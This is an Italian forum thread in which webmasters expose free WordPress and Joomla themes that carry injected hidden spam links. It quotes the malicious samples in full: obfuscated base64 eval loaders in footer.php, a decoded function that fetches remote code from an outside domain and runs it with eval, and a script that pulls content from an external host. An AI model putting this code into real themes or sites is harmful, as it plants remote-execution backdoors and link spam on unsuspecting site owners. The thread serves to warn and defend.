• Moderatore

    Template compromessi, webmaster attenti!!!

    Posto in questa sezione del forum perchè anche se la cosa riguarda in massima parte Wordpress, si tratta comunque di un fenomeno noto anche agli utilizzatori di Joomla e potenzialmente si diffonderà anche per gli altri CMS....

    Vorrei mettere in guardia i webmaster da un pericolo che sta girando da qualche anno sul web italiano e internazionale....

    qualche tempo fa un utente del forum GT riportò la cosa, ma anche lì passò in sordina anche se è un problema non da poco

    chi frequenta le SERP relative ai casinò online, porno, viagra, hotel, ecc.... avrà sicuramente notato la presenza in posizioni di primo piano ( addirittura per casinò online ci sono ben 4 siti dello stesso personaggio/gruppo nelle prime 4 posizioni e altre 3 più giù ) di siti con nomi di dominio assurdi tipo whlyw.com, ijcai-01.org, ilfederalismo.net, ecc...

    i domini in questione sono domini scaduti poi registrati di nuovo e fin qui nulla di strano

    il problema è che il tizio che li gestisce sta guadagnando backlinks hackando i temi wordpress e joomla

    in pratica questo signore inserisce un codice di questo tipo

    
    < ?php
    
    function credits()
    {
    $url = "http://get.templatesbrowser.com/wp.php?" .
    "url=" . urlencode($_SERVER['REQUEST_URI']) . "&" . "host=" . urlencode($_SERVER['HTTP_HOST']);
    $check = @fsockopen("get.templatesbrowser.com", 80, $errno, $errstr, 3);
    if($check)
    {
    @readfile($url);
    fclose($check);
    }
    }
    
    ?>
    

    nel template e poi lo redistribuisce ad ignari webmaster che si ritrovano con link nascosti nei loro blog del tipo

    
    <script type="text/javascript"  language="javascript"> var sc_counter=1496753; var sc_project=2511135; var sc_invisible=0; var sc_partition=24; var  sc_security="30734c7d"; </script> <script type="text/javascript" language="javascript"  src="http://www.statcounter.com/counter/counter.js"></script><noscript><a href="http://www.whlyw.com/">casinò online</a><img  src="http://c25.statcounter.com/counter.php? sc_project=2511135&java=0&security=30734c7d&invisible=0" border="0"></noscript>
    
    

    questa cosa è stata già notato da oltre un anno e ci sono molti articoli interessanti a riguardo

    http://www.bracingyourbrand.com/37/...-black-hat.html
    http://forum.joomla.org/index.php/topic,185573.0.html

    il problema affligge sia Wordpress sia Joomla

    adesso non voglio entrare nel merito delle questioni morali, ma qui se non sbaglio si configura un reato sia secondo la legge italiana che quella americana ( Fellony Act )

    è sconcertante che Google e soci non prendano provvedimenti anzi i siti che diffondono questi template taroccati si sponsorizzano attraverso Adwords

    comunque spero di aver messo la pulce nell'orecchio almeno ai webmaster....vi consiglio di controllare i vostri template alla ricerca di codice strano


  • Moderatore

    guardate che altro ho trovato....

    un sito in prima posizione su Adwords ( quindi Google.com, ecc... ) per la key "temi wordpress"...l'url è h**p://wp.themes.org.in/ ....cioè già il nome è "misleading", visto che qualcuno potrebbe pensare si tratti del sito ufficiale di Wordpress

    scaricate un tema, io ho scaricato Silver....

    nel file footer.php troverete una cosa interessantissima

    
    <?php @eval(@base64_decode("QGV2YWwoQHN0cl9yb3QxMyhAZ3ppbmZsYXRlKEBiYXNlNjRfZGVjb2RlKCJkVkxOanBzd0VMN25LYWFvYXNnQm82cUhTZzBoa2FKTnBCNmlhcVVlZGkvSWRtMFRpZ0FQWU1sVWZmY2FBMHZiMVhMQk05L1B6SGg4VEpNajd6bTBPVzJVWVJSYW84UDN1YkE3K0hYQ2UyWERVMnNzWmgycXJHRlVJVlZ5d25mNzMzczR6dkxUS0F0NnBmaVhPQzZZMEZ5Z2xFVDFPS0FrRkJVeE5ENDYwdUhUNTJEbmRkcmN3Y1ZCeTVoQ0VhUWJjRi9DMHc4TjQrVWU1cmFNa0NvcnNSTGh6b2tncWFBWDJCNkNDYTR0Nnd4dFdiaDFIVzI5YjVEK0Q5RnF3QWxMNGlvbGNMTVdIa3pYS3drUEtGSGNVWk1rNWk4TnZLMEhJNEVMbG10YkFtY0ZDdFJRbDJ0VHkveEZRWHBYd0ZaVXk3clVLRTFIU2NPRzJOOUhMSTI5bzRncy9zeGxOS1VDVUVaWlBBUVhqOEhUaUlISGd2VHYzRGdDT04vWFJWOHVuWWx1OWZ1NnBJTjBQSjdIbzc4R1AzRVN1eTJrbS9YdlJ5OTROaTBsOUZPNzlMS3JXbUNsRzVFUHRmT2IyZVBMV1BOK1RhdmZJcFJ1ZzAzLzdYSlo5dXlsaGpZMjF3amg5Zkg1L0hTN1BwNXYxKzlBWUJ0UC9KYUpnVGppc3IxL21sMUM3K2M5MzBYUmJJeE56M3hqTkIreUh6a0tnM0lhQnVhSXpFeGxCaFNaVkl5SEh5ZUNSUGZPdFNORWtTOVdNMTJPMVhvMTJIVHpCdz09IikpKSk7")); ?>
    
    

    è un codice offuscato, o meglio usa una tecnica di doppio offuscamento

    se provate a decriptarlo alla fine uscirà

    
    <?php function fid($url) {@eval(@file_get_contents($url));}; ?><?php @fid("http://wordpress.themes.net.in/?fid=37"); ?><div id="footer">
        <p>© <?php first_year() ?> <a href="<?php bloginfo('url'); ?>"><?php bloginfo('name'); ?></a>. All Rights Reserved.</p>
        <p><?php bloginfo('name'); ?> is proudly powered by <a href="http://www.highlandsbydesign.com/theme/silver-lexus-theme/" title="Silver Lexus theme">Silver Lexus</a> and <a href="http://wordpress.org/" title="Wordpress">WordPress</a>.</p>
    </div>
    
    </div>
    
    <?php wp_footer(); ?>
    

    la funzione fid scarica il link che verrà inserito nella pagina all'atto della creazione dal motore Wordpress

    astuti eh!?!

    all'inizio pensavo ad una mano russa dietro la faccenda, poi analizzando i whois di alcuni dei domini coinvolti e cercando di mettere insieme le varie info che ho trovato e notando che spessissimo questi signori si appoggiano a domini .in e .cn è ormai chiaro che si tratta di una gang cinese


  • User Newbie

    Ho notato anche io questa cosa, devo dire che la tua analisi è molto più accurata della mia, ma per intuito ero arrivato a sospettare la cosa.

    La domanda è: se è reato, come lo si denuncia ? a chi ? E se si segnala la cosa a google, rientra in ciò che google considera spam o comunque come sito da bannare? E' ridicolo che certe cose passino inosservate..


  • Moderatore

    @teokolo said:

    Ho notato anche io questa cosa, devo dire che la tua analisi è molto più accurata della mia, ma per intuito ero arrivato a sospettare la cosa.

    La domanda è: se è reato, come lo si denuncia ? a chi ? E se si segnala la cosa a google, rientra in ciò che google considera spam o comunque come sito da bannare? E' ridicolo che certe cose passino inosservate..

    beh la stragrande maggioranza dei temi viene rilasciata sotto la licenza Creative Commons che permette modifiche a patto di lasciare inalterate le note di licenza precedenti, in pratica basta lasciare nel footer le stringhe del tipo "This theme is made by blah blah blah"

    il tipo di codice si configura come adware e non è considerato illegale almeno fino ad oggi

    per quanto riguarda google, devo dire che stanno agendo con fermezza e di fatti bannano da Adwords continuamente le varie gallery che contengono temi contraffatti...il problema è che ormai quei siti sono diventati tanto forti da comparire nelle SERP organiche, se cerchi per esempio "wordpress themes" ne trovi 4-5 in prima pagina

    bannare i siti su cui compaiono i link in questione è impossibile e sarebbe ingiusto, in ogni caso è impossibile individuare i siti "infettati"....decisamente bisogna ammettere che come tecnica blackhat è ottima, è al lmite della legge senza violarla ed inoltre difficile da contrastare


  • Bannato User Attivo

    @paolino said:

    ...l'url è h**p://wp.themes.org.in/ ....
    scaricate un tema, io ho scaricato Silver....
    Grazie Paolino,
    se ho capito bene, uno scarica un tema già hackerato, non è che ti entrano in un sito per aggiungerti un link giusto?
    Non è che il sito che citi tu (wp.themes.org.in) è consapevole e/o magari coinvolto?


  • Moderatore

    @adirontack said:

    Grazie Paolino,
    se ho capito bene, uno scarica un tema già hackerato, non è che ti entrano in un sito per aggiungerti un link giusto?

    esatto usano il metodo facile, niente hack un semplice tema modificato ad hoc per inserire link e/o eseguire codice maligno

    Non è che il sito che citi tu (wp.themes.org.in) è consapevole e/o magari coinvolto?

    certo che è coinvolto, è uno dei siti fantoccio messi su per diffondere temi hackerati, da notare che non è un sito ufficiale di Wordpress


  • Moderatore

    @paolino said:

    nel file footer.php troverete una cosa interessantissima

    >
    <?php @eval(@base64_decode("QGV2YWwoQHN0cl9yb3QxMyhAZ3ppbmZsYXRlKEBiYXNlNjRfZGVjb2RlKCJkVkxOanBzd0VMN25LYWFvYXNnQm82cUhTZzBoa2FKTnBCNmlhcVVlZGkvSWRtMFRpZ0FQWU1sVWZmY2FBMHZiMVhMQk05L1B6SGg4VEpNajd6bTBPVzJVWVJSYW84UDN1YkE3K0hYQ2UyWERVMnNzWmgycXJHRlVJVlZ5d25mNzMzczR6dkxUS0F0NnBmaVhPQzZZMEZ5Z2xFVDFPS0FrRkJVeE5ENDYwdUhUNTJEbmRkcmN3Y1ZCeTVoQ0VhUWJjRi9DMHc4TjQrVWU1cmFNa0NvcnNSTGh6b2tncWFBWDJCNkNDYTR0Nnd4dFdiaDFIVzI5YjVEK0Q5RnF3QWxMNGlvbGNMTVdIa3pYS3drUEtGSGNVWk1rNWk4TnZLMEhJNEVMbG10YkFtY0ZDdFJRbDJ0VHkveEZRWHBYd0ZaVXk3clVLRTFIU2NPRzJOOUhMSTI5bzRncy9zeGxOS1VDVUVaWlBBUVhqOEhUaUlISGd2VHYzRGdDT04vWFJWOHVuWWx1OWZ1NnBJTjBQSjdIbzc4R1AzRVN1eTJrbS9YdlJ5OTROaTBsOUZPNzlMS3JXbUNsRzVFUHRmT2IyZVBMV1BOK1RhdmZJcFJ1ZzAzLzdYSlo5dXlsaGpZMjF3amg5Zkg1L0hTN1BwNXYxKzlBWUJ0UC9KYUpnVGppc3IxL21sMUM3K2M5MzBYUmJJeE56M3hqTkIreUh6a0tnM0lhQnVhSXpFeGxCaFNaVkl5SEh5ZUNSUGZPdFNORWtTOVdNMTJPMVhvMTJIVHpCdz09IikpKSk7")); ?>
    
    >```è un codice offuscato, o meglio usa una tecnica di doppio offuscamento
    
    se provate a decriptarlo alla fine uscirà
    
    
    
    Anch'io ho trovato questo codice e ho provato a cancellarlo ma mi fa sparire tutto il footer, come faccio a cacnellare quei link ma a mantenere il footer?
    Grazie mille

  • Moderatore

    lo so purtroppo si son fatti furbi, il codice è offuscato a strati e contiene anche l'html necessario per il corretto rendering

    il mio consiglio è di scaricare il tema dal sito ufficiale dell'autore o da quello di Wordpress


  • Moderatore

    @paolino said:

    lo so purtroppo si son fatti furbi, il codice è offuscato a strati e contiene anche l'html necessario per il corretto rendering

    il mio consiglio è di scaricare il tema dal sito ufficiale dell'autore o da quello di Wordpress

    Scusa paolino ma ho provato a vedere in giro per la rete ma niente da fare: tutti quelli che ho trovato ho perto il file footer e hanno sempre lo stesso codice.

    Hai altri consigli da darmi?
    Il template è evening-alone
    e qui hai un esempio:
    http://wordpresstemplates.name/evening-alone-free-wordpress-template/

    Grazie mille


  • Moderatore

    sfido che non l'hai trovato, a ficcare quel codice offuscato è stato niente di meno che l'autore

    http://impulseblogger.loreleiweb.com/wp-content/uploads/2008/03/eveningalone.zip


  • Moderatore

    @paolino said:

    sfido che non l'hai trovato, a ficcare quel codice offuscato è stato niente di meno che l'autore

    http://impulseblogger.loreleiweb.com/wp-content/uploads/2008/03/eveningalone.zip

    maledetto :fumato: quindi niente da fare devo cambiarlo e basta, giusto?


  • Moderatore

    @riga75 said:

    maledetto :fumato: quindi niente da fare devo cambiarlo e basta, giusto?

    oddio se hai la costanza di decriptare l'intero codice 😄


  • User Attivo

    Anch'io mi son trovata in un template un codice chilometrico indecifrabile e in più pubblicità di casinò ecc ecc con la scritta dello stesso colore del footer.
    Me ne sono accorta perchè ho scelto un template (non trovandone uno in tema col mio blog) e l'ho voluto adattare alle mie esigenze cambiando header e footer. Nel footer ho trovato la sorpresa. Non riuscivo a capire perchè nel sorgente pagina mi trovavo dei link normali e nel file footer.php non c'erano ma trovavo al loro posto il chilometrico codice. Ho provato a togliere il tutto ma spariva una parte di footer.
    Ho risolto eliminando tutto il lunghissimo codice e inserendo nel footer semplice html con i vari link che volevo io, perchè se lasciavo vuoto il footer non mi appariva, in qualche modo dovevo riempirlo 🙂

    Alcuni han subìto un ban temporaneo da google per aver lasciato questo SPAM nel footer e a volte si fa fatica anche a trovarlo. Per fortuna che Wordpress mi modera i commenti perchè tramite un commento mi stava entrando altro SPAM nascosto, i furbi.

    Se volete dare un'occhiata il blog è questo
    *ttp://dolcipiaceri.netsons.org

    e il tema che ho usato si chiama vivo-vista ed è questo
    *ttp://www.wordpressdesigns.net/vivo-vista.html

    date un'occhio ai due footer l'originale e il mio modificato e capirete.

    :ciauz:


  • Moderatore

    @nastrorosa said:

    Anch'io mi son trovata in un template un codice chilometrico indecifrabile e in più pubblicità di casinò ecc ecc con la scritta dello stesso colore del footer.
    Me ne sono accorta perchè ho scelto un template (non trovandone uno in tema col mio blog) e l'ho voluto adattare alle mie esigenze cambiando header e footer. Nel footer ho trovato la sorpresa. Non riuscivo a capire perchè nel sorgente pagina mi trovavo dei link normali e nel file footer.php non c'erano ma trovavo al loro posto il chilometrico codice. Ho provato a togliere il tutto ma spariva una parte di footer.
    Ho risolto eliminando tutto il lunghissimo codice e inserendo nel footer semplice html con i vari link che volevo io, perchè se lasciavo vuoto il footer non mi appariva, in qualche modo dovevo riempirlo 🙂

    Alcuni han subìto un ban temporaneo da google per aver lasciato questo SPAM nel footer e a volte si fa fatica anche a trovarlo. Per fortuna che Wordpress mi modera i commenti perchè tramite un commento mi stava entrando altro SPAM nascosto, i furbi.

    Se volete dare un'occhiata il blog è questo
    *ttp://dolcipiaceri.netsons.org

    e il tema che ho usato si chiama vivo-vista ed è questo
    *ttp://www.wordpressdesigns.net/vivo-vista.html

    date un'occhio ai due footer l'originale e il mio modificato e capirete.

    :ciauz:

    Tagliamo la testa al toro: puoi postrare direttamente il codice che hai messo??
    Grazie mille


  • User Attivo

    aprendo il file **footer.php **ho trovato questo codice:
    i link li ho notati solo per puro caso, guardando il template e selezionando l'area con il tasto sx cliccato..eran nascosti nello sfondo.

    [php]<?php $__F=FILE;$__C='Pz48ZDR2IDRkPSJmMjJ0NXIiPjxwPg0KDQo8P3BocCBibDJnNG5mMignbjFtNScpOyA/PiA0cyBwMnc1cjVkIGJ5IDwxDQpocjVmPSdodHRwOi8vdzJyZHByNXNzLjJyZyc+VzJyZHByNXNzPC8xPiAtIFRoNW01IGQ1czRnbjVkIGJ5IDwxDQpocjVmPSdodHRwOi8vd3d3Lnc1Ymgyc3Q0bmdyMWxseS5jMm0nPlc1YiBIMnN0NG5nPC8xPi48YnIvPjwxDQpocjVmPSJodHRwOi8vd3d3LmlzaDFkNXN0NW1wbDF0NXMuYzJtIj5XNWJzNHQ1IFQ1bXBsMXQ1czwvMT4gfCA8MQ0KaHI1Zj0iaHR0cDovL3d3dy5wM3BkMmd0cjE0bjRuZy5jMm0iPlAzcHB5IFRyMTRuNG5nPC8xPiB8IDwxDQpocjVmPSJodHRwOi8vd3d3LmlzaDFkNXNyNXM1bGw1ci5jMm0iPlI1czVsbDVyIEgyc3Q0bmc8LzE+Lg0KDQoNCg0KPCEtLSA8P3BocCA1Y2gyIGc1dF9uM21fcTM1cjQ1cygpOyA/PiBxMzVyNDVzLiA8P3BocA0KdDRtNXJfc3QycCg2KTsgPz4gczVjMm5kcy4gLS0+CTwvcD48L2Q0dj48L2Q0dj4NCjw/cGhwIGc1dF9zNGQ1YjFyKCk7ID8+DQo8P3BocCB3cF9mMjJ0NXIoKTsgPz4NCjwvYjJkeT4NCjwvaHRtbD4=';eval(base64_decode('JF9fQz1iYXNlNjRfZGVjb2RlKCRfX0MpOwokX19DPXN0cnRyKCRfX0MsIjEyMzQ1NmFvdWllIiwiYW91aWUxMjM0NTYiKTsKJF9fQz1lcmVnX3JlcGxhY2UoJ19fRklMRV9fJywiJyIuJF9fRi4iJyIsJF9fQyk7CmV2YWwoJF9fQyk7CiRfX0M9IiI7'));?><center><a href="http://www.vegascasinoscd.com">casino gambling</a> & <a href="http://www.bestdebtservices.com">Debt Consolidation</a> & <a href="http://www.officialarmy.com">Army</a></center>[/php]dopo varie prove ho buttato tutto il codice di cui sopra e da ignorante in fatto di php ho scritto tutto il footer che mi serviva in html. Due righe con links e il tasto per il login. ho mantenuto il link di chi ha fatto il template anche se si meriterebbe di toglierlo (ma potrei toglierlo?). E poi ho fatto come lui..ho inserito tre puntini (...) che risultano nascosti, per poter mantenere quel dito di footer che se non mettevo niente mi spariva.. google non si arrabbierà mica per 3 puntini nascosti.. 🙂

    Ecco il footer rifatto

    <div id="footer"><p>
    Dolci piaceri è stato creato con <a
    href='http://wordpress.org'>Wordpress</a> - Tema di <a
    href='http://www.webhostingrally.com'>Web Hosting</a><br>Modificato da webmaster <a
    href='mailto:[email protected]'>Dolci piaceri</a> - <a href="http://www.dolcipiaceri.netsons.org/wp-login.php?loggedout=true">LOGIN</a>
    </p></div></div>
    </body>
    </html>
    <center>...</center>per dare un'occhiata al risultato, trovate l'indirizzo del blog qui sopra nel codice.


  • User Newbie

    Il mio footer era criptato, ho risolto il problema aprendo con firefox il file footer.php e copiando il codice sorgente, poi l'ho incollato in dreamweaver ed ho salvato il nuovo footer.php, ora funziona alla grande.


  • Super User

    Ciao
    perdonami ma il tuo post ha dello strano. Anzitutto di che CMS stiamo parlando e successivamente gradirei conoscere che tipo di criptatura o che problema ti dava.

    Ciao